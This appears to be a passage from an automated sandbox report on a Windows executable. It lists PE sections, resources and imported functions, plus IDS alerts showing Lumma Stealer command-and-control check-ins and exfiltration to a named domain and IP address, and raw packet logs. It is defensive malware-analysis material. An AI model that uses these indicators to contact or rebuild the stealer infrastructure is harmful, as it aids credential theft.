                                                                                                                                                  mov edx, dword ptr [004B4200h]
                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x5e08000x2858
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0xcb0000x110000x110007297b2f9d942f6a99fa94e417cd02deaFalse0.18816061580882354data3.7234137464169446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                                                                                                                                  RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                                                                                                                                  RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                                                                                                                                  RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                                                                                                                                  RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                                                                                                                                  RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                                                                                                                                  RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                                                                                                                                  RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                                                                                                                                  RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                                                                                                                                  RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                                                                                                                                  RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                                                                                                                                  RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                                                                                                                                  RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                                                                                                                                  RT_STRING0xd8e000x3f8data0.3198818897637795
                                                                                                                                                  RT_STRING0xd91f80x2dcdata0.36475409836065575
                                                                                                                                                  RT_STRING0xd94d40x430data0.40578358208955223
                                                                                                                                                  RT_STRING0xd99040x44cdata0.38636363636363635
                                                                                                                                                  RT_STRING0xd9d500x2d4data0.39226519337016574
                                                                                                                                                  RT_STRING0xda0240xb8data0.6467391304347826
                                                                                                                                                  RT_STRING0xda0dc0x9cdata0.6410256410256411
                                                                                                                                                  RT_STRING0xda1780x374data0.4230769230769231
                                                                                                                                                  RT_STRING0xda4ec0x398data0.3358695652173913
                                                                                                                                                  RT_STRING0xda8840x368data0.3795871559633027
                                                                                                                                                  RT_STRING0xdabec0x2a4data0.4275147928994083
                                                                                                                                                  RT_RCDATA0xdae900x10data1.5
                                                                                                                                                  RT_RCDATA0xdaea00x310data0.6173469387755102
                                                                                                                                                  RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                                                                                                                                  RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                                                                                                                                  RT_VERSION0xdb2980x584dataEnglishUnited States0.3052407932011331
                                                                                                                                                  RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                                                                                                                  DLLImport
                                                                                                                                                  kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                                                  comctl32.dllInitCommonControls
                                                                                                                                                  user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                                                  oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                                                  advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                  __dbk_fcall_wrapper20x40fc10
                                                                                                                                                  dbkFCallWrapperAddr10x4b063c
                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishUnited States
                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                  2024-11-01T10:50:55.462070+01002057071ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site)1192.168.2.4518681.1.1.153UDP
                                                                                                                                                  2024-11-01T10:50:56.091683+01002057072ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)1192.168.2.449739104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:56.091683+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:56.269364+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449739104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:56.269364+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:56.931094+01002057072ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)1192.168.2.449741104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:56.931094+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:57.391364+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449741104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:57.391364+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:58.181978+01002057072ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)1192.168.2.449743104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:58.181978+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:59.505004+01002057072ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)1192.168.2.449749104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:50:59.505004+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:00.724341+01002057072ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)1192.168.2.449755104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:00.724341+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:02.250998+01002057072ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)1192.168.2.449766104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:02.250998+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449766104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:02.968026+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449766104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:03.970713+01002057072ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)1192.168.2.449777104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:03.970713+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449777104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:03.974381+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449777104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:07.061291+01002057072ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)1192.168.2.449793104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:07.061291+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449793104.21.85.194443TCP
                                                                                                                                                  2024-11-01T10:51:07.534926+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449793104.21.85.194443TCP
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 1, 2024 10:50:21.724653006 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                  Nov 1, 2024 10:50:21.729984045 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:21.730052948 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                  Nov 1, 2024 10:50:44.534722090 CET4973280192.168.2.495.101.111.144
                                                                                                                                                  Nov 1, 2024 10:50:44.534769058 CET4973180192.168.2.495.101.111.137
                                                                                                                                                  Nov 1, 2024 10:50:44.534815073 CET4973080192.168.2.495.101.111.168
                                                                                                                                                  Nov 1, 2024 10:50:44.539947033 CET804973295.101.111.144192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:44.540004015 CET4973280192.168.2.495.101.111.144
                                                                                                                                                  Nov 1, 2024 10:50:44.540529013 CET804973195.101.111.137192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:44.540570021 CET4973180192.168.2.495.101.111.137
                                                                                                                                                  Nov 1, 2024 10:50:44.540581942 CET804973095.101.111.168192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:44.540622950 CET4973080192.168.2.495.101.111.168
                                                                                                                                                  Nov 1, 2024 10:50:55.479036093 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:55.479074001 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:55.479146004 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:55.481863022 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:55.481874943 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.091545105 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.091682911 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.096002102 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.096008062 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.096260071 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.138952971 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.138983011 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.139005899 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.269373894 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.269412041 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.269447088 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.269527912 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.269536972 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.269546032 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.269587040 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.269587040 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.269639969 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.271003962 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.271013975 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.271047115 CET49739443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.271049976 CET44349739104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.315160990 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.315196991 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.315265894 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.315495014 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.315506935 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.931005001 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.931093931 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.932159901 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.932173014 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.932372093 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:56.933443069 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.933465958 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:56.933499098 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.281718016 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:57.281734943 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.281810999 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:57.282059908 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:57.282069921 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.391379118 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.391505003 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.391532898 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.391561031 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.391627073 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.391643047 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.391743898 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.392029047 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.392083883 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.392092943 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.392527103 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.392575026 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.392581940 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.440898895 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.509884119 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.509972095 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.510066986 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.510077000 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.510319948 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.510365963 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.510370970 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.510395050 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.510473967 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.510595083 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.510605097 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.510618925 CET49741443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.510622978 CET44349741104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.544084072 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.544102907 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:57.544166088 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.544698000 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:57.544708967 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.014210939 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.014333010 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.015743017 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.015753984 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.015974998 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.023893118 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.071333885 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.181768894 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.181977987 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.182955980 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.182965994 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.183183908 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.184256077 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.184386969 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.184425116 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.184478045 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.184485912 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.248078108 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.248105049 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.248117924 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.248280048 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.248280048 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.248303890 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.248357058 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.270303011 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.270319939 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.270384073 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.270391941 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.270446062 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.365528107 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.365546942 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.365700960 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.365710974 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.365760088 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.386955023 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.386976004 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.387029886 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.387037039 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.387079954 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.388583899 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.388600111 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.388654947 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.388664961 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.388710022 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.390325069 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.390341043 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.390393972 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.390399933 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.390440941 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.483141899 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.483156919 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.483217001 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.483223915 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.483283043 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.503676891 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.503690958 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.503746986 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.503752947 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.503791094 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.504570007 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.504585981 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.504633904 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.504640102 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.504657030 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.504703999 CET49742443192.168.2.413.107.246.45
